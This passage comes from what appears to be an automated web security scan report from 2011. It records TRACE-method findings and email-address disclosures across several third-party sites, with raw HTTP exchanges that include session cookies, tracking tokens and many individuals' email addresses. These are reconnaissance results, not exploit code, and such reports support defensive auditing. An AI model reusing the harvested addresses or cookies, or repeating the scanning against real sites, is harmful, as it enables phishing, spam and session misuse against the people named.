Host:   http://www.nextadvisor.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.nextadvisor.com
Cookie: 8307df9581a50319

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:13:31 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.nextadvisor.com
Cookie: 8307df9581a50319


25.39. http://www.pcworld.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.pcworld.com
Cookie: a8376a594b0677e6

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:19 GMT
Server: Apache
Content-Type: message/http
Vary: Accept-Encoding
Connection: close

TRACE /gasoline.php?www.pcworld.com@/@ HTTP/1.1
Host: gas1.pcworld.com
Cookie: a8376a594b0677e6
X-Forwarded-For: 173.193.214.243, 192.168.10.200
X-Forwarded-Host: www.pcworld.com
X-Forwarded-Server: www.pcworld.com
Connection: Keep-Alive


25.40. http://www.simpatie.ro/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simpatie.ro
Path:   /

Request

TRACE / HTTP/1.0
Host: www.simpatie.ro
Cookie: 90bf348f4d45a491

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:45:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 90bf348f4d45a491
Host: www.simpatie.ro


26. Email addresses disclosed  previous  next
There are 119 instances of this issue:


26.1. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /click/bstats.gif?kid=44888252&bapid=5555&uid=730083 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=3016771930269.897?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSpNqjFNLbEyLLQwLkyxMrQyUKoFAA%3D%3D"; srh="1%3Aq64FAA%3D%3D"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiosNK4qrzEstDAuTK8xrDHQKTYqLjKsMSyoTMvLq0msMTQsqVLSUUpKzMtLLcoEa1GqrQUA"; vsd=0@1@4db48bb8@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZFtFlK668asQYmeZlJyrSil2cmpVmmCwRKYo%2Bz%2FwRgf"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:45:21 GMT
Set-Cookie: vsd=0@2@4db48be1@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:45:21 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:45:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

26.2. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /click/bstats.gif?kid=44888252&bapid=5555&uid=730083 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=764562517870.2175?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; srh="1%3Aq64FAA%3D%3D"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLU83TSpNqjFNLbEyLLQwLsq0MrIqK6hQqgUA"; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZFtFlK668asQYmeZlJyrSil2cmpVmmCwRKYo%2Bz%2FwRgf"; vsd=0@2@4db48be1@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 24-Jul-2011 00:56:51 GMT
Set-Cookie: ut="1%3AHctBCoAgEAXQu%2Fy1m9FNdBslhQjGHCNRx7sHvf2beC32iSv2luWo2FGKG02pbCmKOg05mGqrkNLdE7N6JXoGDIJnjnL%2BCWt9"; path=/; domain=.adbrite.com; expires=Thu, 22-Apr-2021 00:56:51 GMT
Set-Cookie: vsd=0@1@4db4c6d3@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 00:56:51 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 25 Apr 2011 00:56:51 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

26.3. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Issue detail

The following email address was disclosed in the response:

Request

GET /click/bstats.gif?kid=44888252&bapid=5555&uid=730083 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1883957;type=nonse241;cat=homep792;ord=1;num=5926853162236.512?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2Ki4yrDEsqEzLy6tJrDE0LKlS0lFKSszLSy3KBKtQqq0FAA%3D%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CiMKBjc0MjY5NxjBmaHVByITMjkzMTE0Mjk2MTY0NjYzNDc3NQo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZRAB; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 25-Apr-2011 20:44:40 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiosNK4qrzEstDAuTK8xrDHQKTYqLjKsMSyoTMvLq0msMTQsqVLSUUpKzMtLLcoEa1GqrQUA"; path=/; domain=.adbrite.com; expires=Wed, 21-Apr-2021 20:44:40 GMT
Set-Cookie: vsd=0@1@4db48bb8@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 20:44:40 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 24 Apr 2011 20:44:40 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

26.4. http://cache.amadesa.com/static/client_js/engine/amadesajs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.amadesa.com
Path:   /static/client_js/engine/amadesajs.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/client_js/engine/amadesajs.js HTTP/1.1
Host: cache.amadesa.com
Proxy-Connection: keep-alive
Referer: http://www.myfico.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 00:34:55 GMT
Connection: close
Content-Length: 39747

var AmConstant={COOKIE_NAME:"amcd",MAX_COOKIE_LENGTH:2040,TIME_OUT_COOKIE_NAME:"amtmot",IGNORE_TIME_OUT_COOKIE_NAME:"amignrtmot",EXELATE_COOKIE_NAME:"amexl",TIME_OUT_TOLLERANCE:15000,MAX_CATEGORIE_LEN
...[SNIP]...
left="0px"}}},notifyTestEnvFailed:function(){var A=document.getElementById("holdForTestEnvMessage");if(!A){return }A.innerHTML="An error has occurred while generating your test content. Please contact support@amadesa.com"},buildRefreshTestServerDivs:function(){var B="#amTestServerAppsRefreshBackground {background-color: white;opacity: 0.3;filter: alpha(opacity=30);width: 100%;height: 100%; position: absolute;top: 0px;
...[SNIP]...

26.5. http://controlcase.com/aboutUs_location.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://controlcase.com
Path:   /aboutUs_location.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /aboutUs_location.html HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:22:41 GMT
Server: Apache/2.0.55 (Win32)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:dbrody@controlcase.com">dbrody@controlcase.com</a>
...[SNIP]...
<a href="mailto:kvaswani@controlcase.com">kvaswani@controlcase.com</a>
...[SNIP]...
<a href="mailto:sdadlani@controlcase.com">sdadlani@controlcase.com</a>
...[SNIP]...
<a href="mailto:amerchant@controlcase.com">amerchant@controlcase.com</a>
...[SNIP]...
<a href="mailto:msabbagh@controlcase.com">msabbagh@controlcase.com</a>
...[SNIP]...
<a href="mailto:bjohn@controlcase.com">bjohn@controlcase.com</a>
...[SNIP]...
<a href="mailto:sdadlani@controlcase.com">sdadlani@controlcase.com</a>
...[SNIP]...
<a href="mailto:anambiar@controlcase.com">anambiar@controlcase.com</a>
...[SNIP]...
<a href="mailto:dmori@controlcase.com">dmori@controlcase.com</a>
...[SNIP]...
<a href="mailto:tjayamanne@controlcase.com">tjayamanne@controlcase.com</a>
...[SNIP]...
<a href="mailto:rsuriawarsita@controlcase.com">rsuriawarsita@controlcase.com</a>
...[SNIP]...
<a href="mailto:kganeson@controlcase.com">kganeson@controlcase.com</a>
...[SNIP]...
<a href="mailto:adavid@controlcase.com">adavid@controlcase.com</a>
...[SNIP]...
<a href="mailto:mibrahim@controlcase.com">mibrahim@controlcase.com</a>
...[SNIP]...
<a href="mailto:nphillips@controlcase.com">nphillips@controlcase.com</a>
...[SNIP]...

26.6. http://controlcase.com/notice_privacy.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://controlcase.com
Path:   /notice_privacy.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /notice_privacy.htm HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:25:10 GMT
Server: Apache/2.0.55 (Win32)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:privacy@controlcase.com">privacy@controlcase.com</a>
...[SNIP]...
<a href="mailto:privacy@controlcase.com">privacy@controlcase.com</a>
...[SNIP]...
<a href="mailto:privacy@controlcase.com">privacy@controlcase.com</a>
...[SNIP]...

26.7. http://converseon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://converseon.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?utm_source=google&utm_medium=ppc&utm_campaign=listening&gclid=CMmbouS1tqgCFYNo5Qod7FADDw HTTP/1.1
Host: converseon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:35:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: SESSe1469ec4406ba2c67f2d48b94de6dc4e=fe692229cb21ffdc9f63abb9ca71ad57; expires=Wed, 18-May-2011 04:08:38 GMT; path=/; domain=.converseon.com
Last-Modified: Mon, 25 Apr 2011 00:33:52 GMT
ETag: "a57163b63c08ab6da26b1a84650430c1"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 14576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<a href="mailto:sales@converseon.com">
...[SNIP]...
<a href="mailto:sales@converseon.com">sales@converseon.com</a>
...[SNIP]...

26.8. http://converseon.com/us/dev/sites/all/themes/converseon/css/page-front.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://converseon.com
Path:   /us/dev/sites/all/themes/converseon/css/page-front.css

Issue detail

The following email address was disclosed in the response:

Request

GET /us/dev/sites/all/themes/converseon/css/page-front.css?j HTTP/1.1
Host: converseon.com
Proxy-Connection: keep-alive
Referer: http://converseon.com/?utm_source=google&utm_medium=ppc&utm_campaign=listening&gclid=CMmbouS1tqgCFYNo5Qod7FADDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe1469ec4406ba2c67f2d48b94de6dc4e=ef86deaf7e68aec8b5f3bbd5d34b0a01

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 00:41:41 GMT
Server: Apache
WWW-Authenticate: Basic realm="Dev"
X-Powered-By: PHP/5.3.3
Last-Modified: Thu, 21 Apr 2011 02:36:33 GMT
ETag: "ff0a4631755bd9985b669eb5a1282cc4"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 14522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<a href="mailto:sales@converseon.com">
...[SNIP]...
<a href="mailto:sales@converseon.com">sales@converseon.com</a>
...[SNIP]...

26.9. http://echomail.com/js/oodomimagerollover.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://echomail.com
Path:   /js/oodomimagerollover.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/oodomimagerollover.js HTTP/1.1
Host: echomail.com
Proxy-Connection: keep-alive
Referer: http://echomail.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDAQTTABCB=MILNDKCCKONBCAFLCBPHOMHD

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 08 Jan 2011 12:32:15 GMT
Accept-Ranges: bytes
ETag: "8071a71430afcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:43:39 GMT
Content-Length: 3800

/*
   Header Information------------------------------------[Do Not Remove This Header]--
   Title: OO Dom Image Rollover
   Description: This script makes it easy to add rollover/ mousedown
   effects to
...[SNIP]...
including image submit buttons. Automatically
   preloads images as well. Script works in all DOM capable browsers- IE5+, NS6+,
   Opera7+.
   
   Legal: Copyright 2005 Adam Smith
   Author Email Address: ibulwark@hotmail.com
   Date Created: June 6, 2005
   Website: Codevendor.com | eBadgeman.com
   Script featured on Dynamic Drive: http://www.dynamicdrive.com
   -------------------------------------------------------------------
...[SNIP]...

26.10. http://engine03.echomail.com/icomee-regs/js/validation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://engine03.echomail.com
Path:   /icomee-regs/js/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /icomee-regs/js/validation.js HTTP/1.1
Host: engine03.echomail.com
Proxy-Connection: keep-alive
Referer: http://engine03.echomail.com/icomee-regs/trial/MonitoringTrial.jsp?m=2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FEEE9E501044CA2B9A9053B24A6194EF

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26552-1294469464000"
Last-Modified: Sat, 08 Jan 2011 06:51:04 GMT
Content-Type: text/javascript
Content-Length: 26552
Date: Mon, 25 Apr 2011 00:34:00 GMT

/*$RCSfile: validation.js,v $ $Revision: 1.0 $ $Date: 2009-07-18 10:01:45-04 $ */
/**
* A field is considered valid if less than the specified maximum.
* Fields are not checked if t
...[SNIP]...
focusField.focus();
focusField.scrollLeft=0;
alert(fields.join('\n'));
}
return bValid;
}
   

/**
* Reference: Sandeep V. Tamhankar (stamhankar@hotmail.com),
* http://javascript.internet.com
*/
function checkEmail(email) {
/* if (emailStr.length == 0) {
return true;
}
var emailPat=/^(.+)@(.+)$/;

...[SNIP]...

26.11. http://forums.silverlight.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Fri, 22 Apr 2011 08:37:02 GMT; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; expires=Mon, 23-Apr-2012 15:56:51 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; expires=Mon, 23-Apr-2012 15:56:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; path=/; HttpOnly
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:16:51 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:52 GMT
Content-Length: 62485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...
<a class="dim" href="/members/eddyrubens_4000_hotmail.com.aspx">eddyrubens@hotmail.com</a>
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx" title="mtiede@swtechnologies.com"><img class="post_img" src="http://i1.silverlight.net/avatar/mtiede@swtechnologies.com.jpg?forceidenticon=False&dt=634392429000000000&cdn_id=12152010" alt="mtiede@swtechnologies.com" />
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx">mtiede@swtechnologies.com</a>
...[SNIP]...

26.12. http://forums.silverlight.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /default.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:51 GMT; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dforums.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/default.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:55 GMT; expires=Mon, 23-Apr-2012 15:56:55 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:16:55 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:55 GMT
Content-Length: 62485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head id="ctl00_ctl00"
...[SNIP]...
<a class="dim" href="/members/eddyrubens_4000_hotmail.com.aspx">eddyrubens@hotmail.com</a>
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx" title="mtiede@swtechnologies.com"><img class="post_img" src="http://i1.silverlight.net/avatar/mtiede@swtechnologies.com.jpg?forceidenticon=False&dt=634392429000000000&cdn_id=12152010" alt="mtiede@swtechnologies.com" />
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx">mtiede@swtechnologies.com</a>
...[SNIP]...

26.13. http://forums.silverlight.net/forums/13.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/13.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /forums/13.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
